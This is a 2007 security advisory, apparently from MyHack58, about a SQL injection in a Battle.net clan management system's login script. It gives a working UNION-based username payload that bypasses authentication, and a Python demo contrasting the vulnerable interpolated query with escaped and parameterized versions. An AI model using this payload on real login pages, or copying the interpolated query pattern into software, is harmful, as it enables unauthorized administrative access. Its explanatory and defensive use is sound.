US Blizzard [World of Warcraft] official program vulnerability - vulnerability warning - MyHack58

2007-04-16T00:00:00
ID MYHACK58:62200715052
Type myhack58
Reporter Anonymous
Modified 2007-04-16T00:00:00

Description

The Battle.net clan management system uses a MySQL backend so that users can easily upgrade and maintain the web site. Its implementation contains an input validation vulnerability: a remote attacker can exploit it to carry out SQL injection attacks and gain unauthorized administrative access to the system.

The Battle.net clan system's login.php script does not properly validate the user parameters it receives from index.php:

line 9  -> $user = $_POST['user'];
line 10 -> $pass = $_POST['pass'];

..... ..... .....

line 21 -> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);

Because $user and $pass are interpolated straight into the query string, this lets an attacker log in with administrator privileges. A successful attack requires magic_quotes_gpc to be off.

Username : 'union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/* password : anything
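The following is an added example, not code from the advisory or from the clan management project. It reproduces the query pattern from login.php line 21 against an in-memory SQLite table and shows three outcomes side by side: the interpolated query accepts the published username with any password, the same query with the quote escaped (a stand-in for what magic_quotes_gpc did, which is why the advisory says it must be off) rejects it, and a parameterized query rejects it regardless. The table schema and its eleven columns are assumptions: the page does not give the real bcs_members layout, and eleven was inferred from the eleven zeros in the payload. Note that PHP's addslashes() backslash-escapes quotes, which MySQL honours but SQLite does not, so the escaping helper here doubles the quote instead to make the same point.

```python
import sqlite3

# Constructed stand-in for bcs_members (assumed schema, not from the advisory).
# Eleven columns, matching the eleven zeros in the published payload.
SCHEMA = """
CREATE TABLE bcs_members (
    id INTEGER PRIMARY KEY, name TEXT, password TEXT, email TEXT, rank TEXT,
    joined TEXT, c7 TEXT, c8 TEXT, c9 TEXT, c10 TEXT, c11 TEXT
);
INSERT INTO bcs_members VALUES
    (1, 'admin', 's3cret', 'admin@example.invalid', 'admin', '2007-01-01',
     '', '', '', '', '');
"""

# The username from the advisory; the password can be anything.
INJECTED_USER = "'union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, user, password):
    """Mirrors login.php line 21: user input is pasted into the SQL text,
    so a quote in the username ends the literal and the rest is parsed as SQL."""
    sql = ("SELECT * FROM bcs_members WHERE name='%s' AND password='%s'"
           % (user, password))
    return conn.execute(sql).fetchone()


def escape_like_magic_quotes(value):
    """Stand-in for magic_quotes_gpc (assumed, not the PHP implementation).
    addslashes() would emit \\' for MySQL; SQLite does not treat backslash as
    an escape, so the SQL-standard doubled quote is used to show the effect:
    the attacker's quote no longer terminates the string literal."""
    return value.replace("'", "''")


def login_with_magic_quotes(conn, user, password):
    return login_vulnerable(conn,
                            escape_like_magic_quotes(user),
                            escape_like_magic_quotes(password))


def login_parameterized(conn, user, password):
    """The fix: bind values through placeholders so input is never parsed as SQL."""
    sql = "SELECT * FROM bcs_members WHERE name=? AND password=?"
    return conn.execute(sql, (user, password)).fetchone()


def demo():
    """Return whether each login variant yields a row (i.e. passes the credential check)."""
    conn = open_db()
    return {
        "legit_vulnerable": login_vulnerable(conn, "admin", "s3cret") is not None,
        "injected_vulnerable": login_vulnerable(conn, INJECTED_USER, "anything") is not None,
        "injected_magic_quotes": login_with_magic_quotes(conn, INJECTED_USER, "anything") is not None,
        "injected_parameterized": login_parameterized(conn, INJECTED_USER, "anything") is not None,
        "legit_parameterized": login_parameterized(conn, "admin", "s3cret") is not None,
    }


if __name__ == "__main__":
    for name, passed in demo().items():
        print("%-24s %s" % (name, "row returned" if passed else "no row"))
```

The injected username turns the WHERE clause into `name='' UNION SELECT 0,... FROM bcs_members` with the trailing `/*` commenting out the password check, so a row comes back and the script treats the login as successful. Quote escaping blocks this particular payload, but it is a fragile defence (magic_quotes_gpc was removed from PHP entirely); the parameterized query is the durable fix.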

Note: SourceForge has published this; the two downloads I got from Blizzard in December use different methods, and they found more in April this year.